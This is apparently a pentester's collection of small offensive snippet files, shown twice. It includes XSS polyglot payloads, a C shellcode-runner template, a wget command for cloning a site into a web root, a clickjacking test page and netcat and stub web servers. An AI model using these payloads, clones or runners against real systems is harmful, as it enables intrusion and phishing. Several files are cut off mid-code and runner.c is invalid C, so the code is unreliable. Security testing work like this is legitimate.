saulpanders

## winget-manifest-test.yml
PackageIdentifier: TestInstall
PackageVersion: 1.0.0
PackageLocale: en-US
Publisher: Acme
PackageName: Test
License: MIT
ShortDescription: WinGet test
Installers:
 - Architecture: x64
   InstallerType: exe

## servewasm.py
#!/usr/bin/env python3

import http.server
import socketserver

PORT = 8080

Handler = http.server.SimpleHTTPRequestHandler
Handler.extensions_map.update({
    '.wasm': 'application/wasm',

## runner.c
#include <stdio.h>

# shellcode goes here
unsigned char buf[] =
"\x90";


 int main(){
     int (*ret)();
     ret = (int(*)())buf;

## test.hta
<html>
<head>
  <title>HTML Application (HTA)</title>
  <meta http-equiv="x-ua-compatible" content="ie=9">
</head>

<body>

<p>Misc HTML elements</p>

## simpleserver.js
var http = require('http');

http.createServer(function (req, res) {
    res.writeHead(200, {'Content-Type': 'text/html'});
    res.end('Hello World!');
}).listen(8080);

console.log("yo, check port 8080")

## clone_site.sh
wget -E -H -k -K -p -nd -o logwget.txt --directory-prefix /var/www/html <target>

## clickjack_test.html
<html>
  <head>
    <title>Clickjack Test</title>
  </head>
  <body>
    <p>Website at "xxx" vulnerable to clickjacking!</p>
    <iframe src="xxx" width="650" height="650"></iframe>
  </body>
</html>

## xss-polyglots.txt
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

'--><svg onload=alert()>

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

## netcat-webserver.sh
#! /bin/bash
# https://gist.github.com/Plazmaz/cafd0bd3a3a4471446cc8fe6e4f0c036

sudo bash -c 'while true; do echo "HTTP/1.1 200 OK\n\n" |nc -l -p 80 |egrep -v "Accept" |egrep -v "Content-Length" |egrep -v "Host" |egrep -vi "cache"; done'
	PackageIdentifier: TestInstall
	PackageVersion: 1.0.0
	PackageLocale: en-US
	Publisher: Acme
	PackageName: Test
	License: MIT
	ShortDescription: WinGet test
	Installers:
	- Architecture: x64
	InstallerType: exe
	#!/usr/bin/env python3

	import http.server
	import socketserver

	PORT = 8080

	Handler = http.server.SimpleHTTPRequestHandler
	Handler.extensions_map.update({
	'.wasm': 'application/wasm',
	#include <stdio.h>

	# shellcode goes here
	unsigned char buf[] =
	"\x90";


	int main(){
	int (*ret)();
	ret = (int(*)())buf;
	<html>
	<head>
	<title>HTML Application (HTA)</title>
	<meta http-equiv="x-ua-compatible" content="ie=9">
	</head>

	<body>

	<p>Misc HTML elements</p>
	var http = require('http');

	http.createServer(function (req, res) {
	res.writeHead(200, {'Content-Type': 'text/html'});
	res.end('Hello World!');
	}).listen(8080);

	console.log("yo, check port 8080")
	<html>
	<head>
	<title>Clickjack Test</title>
	</head>
	<body>
	<p>Website at "xxx" vulnerable to clickjacking!</p>
	<iframe src="xxx" width="650" height="650"></iframe>
	</body>
	</html>
	jaVasCript:/-/`/\`/'/"//(/ */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

	'--><svg onload=alert()>

	javascript:"/'/`/--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/<svg/*/onload=alert()//>
	#! /bin/bash
	# https://gist.github.com/Plazmaz/cafd0bd3a3a4471446cc8fe6e4f0c036

	sudo bash -c 'while true; do echo "HTTP/1.1 200 OK\n\n" \|nc -l -p 80 \|egrep -v "Accept" \|egrep -v "Content-Length" \|egrep -v "Host" \|egrep -vi "cache"; done'